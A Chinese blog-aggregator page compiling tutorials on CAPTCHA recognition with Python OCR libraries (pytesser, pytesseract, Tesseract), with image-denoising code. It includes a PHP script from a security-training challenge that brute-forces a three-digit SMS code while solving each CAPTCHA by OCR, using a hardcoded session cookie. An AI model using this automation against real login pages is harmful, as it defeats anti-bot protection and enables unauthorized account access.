关于利用python进行验证码识别的一些想法

用python加“验证码”为关键词在baidu里搜一下，可以找到很多关于验证码识别的文章。我大体看了一下，主要方法有几类：一类是通过对图片进行处理，然后利用字库特征匹配的方法，一类是图片处理后建立字符对应字典，还有一类是直接利用ocr模块进行识别。不管是用什么方法，都需要首先对图片进行处理，于是试着对下面的验证码进行分析。
一、图片处理

这个验证码中主要的影响因素是中间的曲线，首先考虑去掉图片中的曲线。考虑了两种算法：

第一种是首先取到曲线头的位置，即x=0时，黑点的位置。然后向后移动x的取值，观察每个x下黑点的位置，判断前后两个相邻黑点之间的距离，如果距离在一
定范围内，可以基本判断该点是曲线上的点，最后将曲线上的点全部绘成白色。试了一下这种方法，结果得到的图片效果很一般，曲线不能完全去除，而且容量将字
符的线条去除。

第二种考虑用单位面积内点的密度来进行计算。于是首先计算单位面积内点的个数，将单位面积内点个数少于某一指定数的面积去除，剩余的部分基本上就是验证码
字符的部分。本例中，为了便于操作，取了5*5做为单位范围，并调整单位面积内点的标准密度为11。处理后的效果：

二、字符验证
        这里我使用的方法是利用pytesser进行ocr识别，但由于这类验证码字符的不规则性，使得验证结果的准确性并不是很高。具体哪位大牛，有什么好的办法，希望能给指点一下。
        三、准备工作与代码实例
        1、PIL、pytesser、tesseract
        (1)安装PIL：下载地址：http://www.pythonware.com/products/pil/
        (2)pytesser:下载地址：http://code.google.com/p/pytesser/,下载解压后直接放在代码相同的文件夹下，即可使用。
        (3)Tesseract OCR engine下载：http://code.google.com/p/tesseract-ocr/，下载后解压，找到tessdata文件夹，用其替换掉pytesser解压后的tessdata文件夹即可。
        2、具体代码

#encoding=utf-8
###利用点的密度计算
import Image,ImageEnhance,ImageFilter,ImageDraw
import sys
from pytesser import *
#计算范围内点的个数
def numpoint(im):
    w,h = im.size
    data = list( im.getdata() )
    mumpoint=0
    for x in range(w):
        for y in range(h):
            if data[ y*w + x ] !=255:#255是白色
                mumpoint+=1
    return mumpoint

#计算5*5范围内点的密度
def pointmidu(im):
    w,h = im.size
    p=[]
    for y in range(0,h,5):
        for x in range(0,w,5):
            box = (x,y, x+5,y+5)
            im1=im.crop(box)
            a=numpoint(im1)
            if a<11:##如果5*5范围内小于11个点，那么将该部分全部换为白色。
                for i in range(x,x+5):
                    for j in range(y,y+5):
                        im.putpixel((i,j), 255)
    im.save(r'img.jpg')

def ocrend():##识别
    image_name = "img.jpg"
    im = Image.open(image_name)
    im = im.filter(ImageFilter.MedianFilter())
    enhancer = ImageEnhance.Contrast(im)
    im = enhancer.enhance(2)
    im = im.convert('1')
    im.save("1.tif")
    print image_file_to_string('1.tif')    

if __name__=='__main__':
    image_name = "1.png"
    im = Image.open(image_name)
    im = im.filter(ImageFilter.DETAIL)
    im = im.filter(ImageFilter.MedianFilter())

    enhancer = ImageEnhance.Contrast(im)
    im = enhancer.enhance(2)
    im = im.convert('1')
    ##a=remove_point(im)
    pointmidu(im)
    ocrend()

（一）使用pytesser

1、下载安装pil

下载： http://www.pythonware.com/products/pil/

执行安装文件

2、下载安装pytesser

下载:http://code.google.com/p/pytesser/

解压，“...\pytesser”，设置环境变量PYTHONPATH，添加“...\pytesser”

3、程序执行

import os

import pytesser

os.chdir("E:/software/python/pytesser")

pytesser.image_file_to_string('c:/check.bmp')

参考:http://code.google.com/p/pytesser/

说明：该项目似乎只是"tesseract-ocr"一个ptyhon封装的外壳，并且此项目似乎还一直停留在0.01版没有更新,而且该外壳似乎还存在比较严重的bug,更深入的解决方案应该是参考"tesseract-ocr" 参考 http://code.google.com/p/tesseract-ocr/。

4、改进程序只能在当前目录下调用的问题

在目录下新增一个文件 mypytesser.py 文件

import os

import pytesser

def image_file_to_string(file):

cwd = os.getcwd()

try :

os.chdir("E:\software\python\pytesser")

return pytesser.image_file_to_string(file)

finally:

os.chdir(cwd)

在命令航使用一下命令进行图片解析

import mypytesser

print mypytesser.image_file_to_string("c:/check.bmp");

(二)自己编写代码来实现

http://blog.feshine.net/technology/1163.html

（三）tesseract-ocr基础

1、基本操作

cmd>tesseract c:\check1.bmp c:\check1

在tesseract.log可以看见程序反馈，但可以了解的信息不多，需要深入了解tesseract项目。

2、极容易出现的问题是，图像文件打开会报错，需要将图像文件的dpi改为200*200，可以用python代码解决：

python>>>import Image

python>>>image = Image.open(r”c:\check.bmp”)

python>>>image.save(r”c:\check1.bmp”, dpi=(200,200))

python中的验证码识别库PyTesser

PyTesser

PyTesser is an Optical Character Recognition module for Python. It takes as input an image or image file and outputs a string.

PyTesser uses the Tesseract OCR engine, converting images to an accepted format and calling the Tesseract executable as an external script. A Windows executable is provided along with the Python scripts. The scripts should work in other operating systems as well.

Dependencies

PIL is required to work with images in memory. PyTesser has been tested with Python 2.4 in Windows XP.

Usage Example

>>>from pytesser import* >>> image =Image.open('fnord.tif')  # Open image object using PIL >>>print image_to_string(image)     # Run tesseract.exe on image fnord >>>print image_file_to_string('fnord.tif') fnord

(more examples in README)

pytesser下载

http://code.google.com/p/pytesser/

Tesseract OCR engine下载：

http://code.google.com/p/tesseract-ocr/

PIL官方下载

http://www.pythonware.com/products/pil/

最近在做网络信息安全攻防学习平台的题目，发现有些题居然需要用到验证码识别，这玩意以前都觉得是高大上的东西，一直没有去研究，这次花了点时间研究了一下，当然只是一些基础的东西，高深的我也不会，分享一下给大家吧。

这次验证码识别，我使用的python来实现的，发现python果然是强大无比，但是在验证码识别库的安装上面有点小问题。

关于python验证码识别库，网上主要介绍的为pytesser及pytesseract，其实pytesser的安装有一点点麻烦，所以这里我不考虑，直接使用后一种库。

python验证码识别库安装

要安装pytesseract库，必须先安装其依赖的PIL及tesseract-ocr，其中PIL为图像处理库，而后面的tesseract-ocr则为google的ocr识别引擎。

1、PIL 下载地址：

PIL-1.1.7.win-amd64-py2.7.exe

PIL-1.1.7.win32-py2.7.exe

或者直接使用pillow来代替，使用方法基本没有什么区别。

http://www.lfd.uci.edu/~gohlke/pythonlibs/#pillow

2、tesseract-ocr下载地址：

tesseract-ocr-setup-3.02.02.exe

3、pytesseract安装

直接使用pip install pytesseract安装即可，或者使用easy_install pytesseract

python验证码识别方法

`01`	`#!/usr/bin/env python`

`02`	`# -- coding: gbk --`

`03`	`# -- coding: utf_8 --`

`04`	`# Date: 2014/11/27`

`05`	`# Created by 独自等待`

`06`	`# 博客 http://www.waitalone.cn/`

07 try:

`08`	`import` `pytesseract`

`09`	`from` `PIL` `import` `Image`

`10`	`except` `ImportError:`

`11`	`print` `'模块导入错误,请使用pip安装,pytesseract依赖以下库：'`

`12`	`print` `'http://www.lfd.uci.edu/~gohlke/pythonlibs/#pil'`

`13`	`print` `'http://code.google.com/p/tesseract-ocr/'`

`14`	`raise` `SystemExit`

15

`16`	`image` `=` `Image.open('vcode.png')`

`17`	`vcode` `=` `pytesseract.image_to_string(image)`

`18`	`print` `vcode`

识别率还挺高的，当然这也和验证码本身有关，因为这个验证码设计的比较容易识别。

python识别验证码，就是这么简单，大家还不快来试一试？

php验证码识别方法

关于php的验证码识别，这个我没有深入研究，但是用python实现完了以后就明白了，其实只要借助ocr识别库就可以了，直接贴上之前脚本关第9关的代码。

python实现的验证码识别破解实例请关注：

http://www.waitalone.cn/security-scripts-game.html

01 <?php

02 /**

`03`	`* Created by 独自等待`

`04`	`* Date: 2014/11/20`

`05`	`* Time: 9:27`

`06`	`* Name: ocr.php`

`07`	`* 独自等待博客：http://www.waitalone.cn/`

08 */

`09`	`error_reporting(7);`

`10`	`if` `(!extension_loaded('curl'))` `exit('请开启CURL扩展,谢谢!');`

`11`	`crack_key();`

12

`13`	`function` `crack_key()`

14 {

`15`	`$crack_url` `=` `'http://1.hacklist.sinaapp.com/vcode7_f7947d56f22133dbc85dda4f28530268/login.php';`

`16`	`for` `($i` `= 100;` `$i` `<= 999;` `$i++) {`

`17`	`$vcode` `= mkvcode();`

`18`	`$post_data` `=` `array(`

`19`	`'username'` `=> 13388886666,`

`20`	`'mobi_code'` `=>` `$i,`

`21`	`'user_code'` `=>` `$vcode,`

`22`	`'Login'` `=>` `'submit'`

23 );

`24`	`$response` `= send_pack('POST',` `$crack_url,` `$post_data);`

`25`	`if` `(!strpos($response,` `'error')) {`

`26`	`system('cls');`

`27`	`echo` `$response;`

28 break;

29 }else{

`30`	`echo` `$response."\n";`

31 }

32 }

33 }

34

35

`36`	`function` `mkvcode()`

37 {

`38`	`$vcode` `=` `'';`

`39`	`$vcode_url` `=` `"http://1.hacklist.sinaapp.com/vcode7_f7947d56f22133dbc85dda4f28530268/vcode.php";`

`40`	`$pic` `= send_pack('GET',` `$vcode_url);`

`41`	`file_put_contents('vcode.png',` `$pic);`

`42`	`$cmd` `=` `"\"D:\\Program Files (x86)\\Tesseract-OCR\\tesseract.exe\" vcode.png vcode";`

`43`	`system($cmd);`

`44`	`if` `(file_exists('vcode.txt')) {`

`45`	`$vcode` `=` `file_get_contents('vcode.txt');`

`46`	`$vcode` `= trim($vcode);`

`47`	`$vcode` `=` `str_replace(' ',` `'',` `$vcode);`

48 }

`49`	`if` `(strlen($vcode) == 4) {`

`50`	`return` `$vcode;`

`51`	`}` `else` `{`

`52`	`return` `mkvcode();`

53 }

54 }

55

`56`	`//数据包发送函数`

`57`	`function` `send_pack($method,` `$url,` `$post_data` `=` `array())`

58 {

`59`	`$cookie` `=` `'saeut=218.108.135.246.1416190347811282;PHPSESSID=6eac12ef61de5649b9bfd8712b0f09c2';`

`60`	`$curl` `= curl_init();`

`61`	`curl_setopt($curl, CURLOPT_URL,` `$url);`

`62`	`curl_setopt($curl, CURLOPT_HEADER, 0);`

`63`	`curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);`

`64`	`curl_setopt($curl, CURLOPT_COOKIE,` `$cookie);`

`65`	`if` `($method` `==` `'POST') {`

`66`	`curl_setopt($curl, CURLOPT_POST, 1);`

`67`	`curl_setopt($curl, CURLOPT_POSTFIELDS,` `$post_data);`

68 }

`69`	`$data` `= curl_exec($curl);`

`70`	`curl_close($curl);`

`71`	`return` `$data;`

72 }

文中用到的文件下载

点我下载

http://vipscu.blog.163.com/blog/static/18180837220134234528457/

http://drops.wooyun.org/tips/4550

http://drops.wooyun.org/tips/141

http://netsecurity.51cto.com/art/201306/399335_all.htm

http://blog.sina.com.cn/s/blog_74a7e56e010177l8.html

http://blog.csdn.net/csapr1987/article/details/7728315

http://blog.csdn.net/suiyunonghen/article/details/3763023

http://blog.csdn.net/nwpulei/article/details/8457738

http://blog.itpub.net/25437692/viewspace-756613/

http://blog.sina.com.cn/s/blog_62c02a630100ma7e.html

http://www.linuxde.net/2013/04/13310.html

http://xiaoxia.org/2011/05/31/boring-entry-the-fabled-verification-code-recognition-technology-learning-notes/

http://blog.csdn.net/xcy13638760/article/details/41445867

http://blog.csdn.net/problc/article/details/22796971

http://www.zhihu.com/question/22479139

http://lcx.cc/?i=4288

http://drops.wooyun.org/tips/6313

http://blog.sina.com.cn/s/blog_620987bf0102v2zf.html

http://www.05112.com/anquan/wlgf/2014/1209/17494.html

http://blog.feshine.net/technology/1163.html

http://blog.chinaunix.net/uid-28727803-id-3761492.html

http://www.cnblogs.com/rupeng/archive/2013/04/25/3042799.html

http://www.2cto.com/Article/201505/403244.html

python验证码识别的更多相关文章

Python 验证码识别-- tesserocr
Python 验证码识别-- tesserocr tesserocr 是 Python 的一个 OCR 识别库 ,但其实是对 tesseract 做的一层 Python API 封装,所以它的核心是 ...
【转】Python验证码识别处理实例
原文出处: 林炳文(@林炳文Evankaka) 一.准备工作与代码实例 1.PIL.pytesser.tesseract (1)安装PIL:下载地址:http://www.pythonware.com ...
Python 验证码识别（别干坏事哦...）
关于python验证码识别库,网上主要介绍的为pytesser及pytesseract,其实pytesser的安装有一点点麻烦,所以这里我不考虑,直接使用后一种库. python验证码识别库安装要安 ...
Windows平台python验证码识别
参考: http://oatest.dragonbravo.com/Authenticate/SignIn?returnUrl=%2f http://drops.wooyun.org/tips/631 ...
Python验证码识别处理实例(转载)
版权声明:本文为博主林炳文Evankaka原创文章,转载请注明出处http://blog.csdn.net/evankaka 一.准备工作与代码实例 1.PIL.pytesser.tesseract ...
Python验证码识别处理实例（转）
一.准备工作与代码实例 1.PIL.pytesser.tesseract (1)安装PIL:下载地址:http://www.pythonware.com/products/pil/(CSDN下载) 下 ...
python 验证码识别示例（一）某个网站验证码识别
某个招聘网站的验证码识别,过程如下一: 原始验证码: 二: 首先对验证码进行分析,该验证码的数字颜色有变化,这个就是识别这个验证码遇到的比较难的问题,解决方法是使用PIL 中的 getpixel ...
Python验证码识别处理实例
一.准备工作与代码实例 1.PIL.pytesser.tesseract (1)安装PIL:下载地址:http://www.pythonware.com/products/pil/(CSDN下载) 下 ...
python验证码识别(2)极验滑动验证码识别
目录一:极验滑动验证码简介二:极验滑动验证码识别思路三:极验验证码识别一:极验滑动验证码简介近些年来出现了一些新型验证码,不想旧的验证码对人类不友好,但是这种验证码对于代码来说识别难度上 ...

随机推荐

使用LiveWriter发布Orchard博客
我们可以Windows Live Writer来发布Orchard博客在Dashboard–> Modules菜单找到 Remote Blog Publishing 模块.点击 Enable ...
【原创】MapGIS K9 三维二次开发入门
开发语言:C# 平台版本:MapGIS K9 SP3 MapGIS K9三维平台也提供了接口和组件以实现二次开发.用户可以根据提供的接口和组件进行二次开发,也可以借助MapGISK9数据中心框架,可以 ...
Css小技巧-图片垂直居中
说明:样式设置主要是针对图片的父级元素,并非图片元素本身. Css代码[图片父级点的样式]: <style> .box { /*非IE的主流浏览器识别的垂直居中的方法*/ display: ...
命名空间“System.Web.Mvc”中不存在类型或命名空间“Ajax”(是否缺少程序集引用?)
原文 http://www.cnblogs.com/LJP-JumpAndFly/p/4109602.html 好吧,非常激动的说,这个问题搞了我一个晚上,网上的帖子太少了,好像不超过2篇,而且说得 ...
SQL Identity自增列清零方法
1.使用DBCC控制台命令: dbcc checkident(表名,RESEED,0) 2.truncate table 也可将当前标识值清零但当有外键等约束时,无法truncate表可以先禁用外 ...
border-radius.htc为ie6-8实现圆角
~~圆角是比较常用的css3属性,但是ie6-8并不支持圆角,可用border-radius.htc html组件实现圆角, border-radius.htc内部应用vml进行了重绘 border ...
GDB调试精粹及使用实例
一:列文件清单 1． List (gdb) list line1,line2 二:执行程序要想运行准备调试的程序,可使用run命令,在它后面可以跟随发给该程序的任何参数,包括标准输入和标准输出说明符 ...
Oracle 11g RAC 环境下单实例非缺省监听及端口配置
如果在Oracle 11g RAC环境下使用dbca创建单实例数据库后,Oracle会自动将其注册到缺省的1521端口及监听器.大多数情况下我们使用的为非缺省监听器以及非缺省的监听端口.而且在Orac ...
【解决ViewPager在大屏上滑动不流畅】设置ViewPager滑动翻页距离
在项目中做了一个ViewPager+Fragment滑动翻页的效果,在模拟器和小米手机上测试也比较正常.但是换到4.7以上屏幕测试的时候发现老是滑动失效. 因为系统默认的滑动策略是当用户滑动超过半屏之 ...
iOS KVO & KVC
键值观察:值更改时通知观察者键值观察(Key-value observing,或简称 KVO)允许对象观察另一个对象的属性.该属性值改变时,会通知观察对象.它了解新值以及旧值:如果观察的属性为对多的 ...

python验证码识别